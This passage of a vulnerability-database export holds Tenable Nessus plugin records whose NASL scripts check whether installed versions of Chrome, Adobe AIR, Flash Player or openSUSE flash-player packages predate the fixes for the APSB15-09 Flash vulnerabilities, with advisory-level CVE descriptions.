script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 42.0.2311.152. It is, therefore, affected by multiple\nvulnerabilities related to Adobe Flash :\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - Multiple validation bypass vulnerabilities exists that\n allow an attacker to lead to write arbitrary data to the\n file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/05/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7417f6c2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 42.0.2311.152 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3093\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'42.0.2311.152', severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:30:18", "description": "The version of Google Chrome installed on the remote Mac OS X host is\nprior to 42.0.2311.152. It is, therefore, affected by multiple\nvulnerabilities related to Adobe Flash :\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - Multiple validation bypass vulnerabilities exists that\n allow an attacker to lead to write arbitrary data to the\n file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 26, "published": "2015-05-12T00:00:00", "title": "Google Chrome < 42.0.2311.152 Multiple Vulnerabilities (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_42_0_2311_152.NASL", "href": "https://www.tenable.com/plugins/nessus/83368", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83368);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n \"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 74609,\n 74610,\n 74612,\n 74614,\n 74616,\n 74617\n );\n\n script_name(english:\"Google Chrome < 42.0.2311.152 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 42.0.2311.152. It is, therefore, affected by multiple\nvulnerabilities related to Adobe Flash :\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - Multiple validation bypass vulnerabilities exists that\n allow an attacker to lead to write arbitrary data to the\n file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/05/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7417f6c2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 42.0.2311.152 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3093\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'42.0.2311.152', severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:12:25", "description": "The Adobe flash-player package was updated to version 11.2.202.460 to\nfix several security issues.\n\nThe following vulnerabilities were fixed (bsc#930677) :\n\n - APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078,\n CVE-2015-3079, CVE-2015-3080, CVE-2015-3081,\n CVE-2015-3082, CVE-2015-3083, CVE-2015-3084,\n CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3091, CVE-2015-3092, CVE-2015-3093\n\nMore information can be found at the Adobe Security Bulletin\nAPSB15-09:\nhttps://helpx.adobe.com/security/products/flash-player/apsb15-09.html", "edition": 16, "published": "2015-05-20T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-2015-372)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2015-05-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2015-372.NASL", "href": "https://www.tenable.com/plugins/nessus/83559", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-372.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83559);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2015-372)\");\n script_summary(english:\"Check for the openSUSE-2015-372 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Adobe flash-player package was updated to version 11.2.202.460 to\nfix several security issues.\n\nThe following vulnerabilities were fixed (bsc#930677) :\n\n - APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078,\n CVE-2015-3079, CVE-2015-3080, CVE-2015-3081,\n CVE-2015-3082, CVE-2015-3083, CVE-2015-3084,\n CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3091, CVE-2015-3092, CVE-2015-3093\n\nMore information can be found at the Adobe Security Bulletin\nAPSB15-09:\nhttps://helpx.adobe.com/security/products/flash-player/apsb15-09.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=930677\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.460-116.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.460-116.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.460-116.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.460-2.51.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.460-2.51.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.460-2.51.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:14:07", "description": "According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that\n allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race\n condition exists that allows an attacker to bypass\n Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that\n allow an attacker to read and write arbitrary data to\n the file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper\n validation of user-supplied input. A remote attacker can\n exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)", "edition": 26, "published": "2015-06-12T00:00:00", "title": "Adobe AIR <= 17.0.0.144 Multiple Vulnerabilities (APSB15-09)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB15-09.NASL", "href": "https://www.tenable.com/plugins/nessus/84157", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84157);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n \"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3081\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 74609,\n 74610,\n 74612,\n 74613,\n 74614,\n 74616,\n 74617\n );\n\n script_name(english:\"Adobe AIR <= 17.0.0.144 Multiple Vulnerabilities (APSB15-09)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that\n allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race\n condition exists that allows an attacker to bypass\n Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that\n allow an attacker to read and write arbitrary data to\n the file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper\n validation of user-supplied input. A remote attacker can\n exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 17.0.0.172 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3093\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '17.0.0.144';\nfix = '17.0.0.172';\nfix_ui = '17.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T02:33:34", "description": "The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 17.0.0.169. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that\n allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race\n condition exists that allows an attacker to bypass\n Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that\n allow an attacker to read and write arbitrary data to\n the file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper\n validation of user-supplied input. A remote attacker can\n exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)", "edition": 25, "published": "2015-05-12T00:00:00", "title": "Adobe Flash Player <= 17.0.0.169 Multiple Vulnerabilities (APSB15-09)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSA15-09.NASL", "href": "https://www.tenable.com/plugins/nessus/83365", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83365);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n \"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3081\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 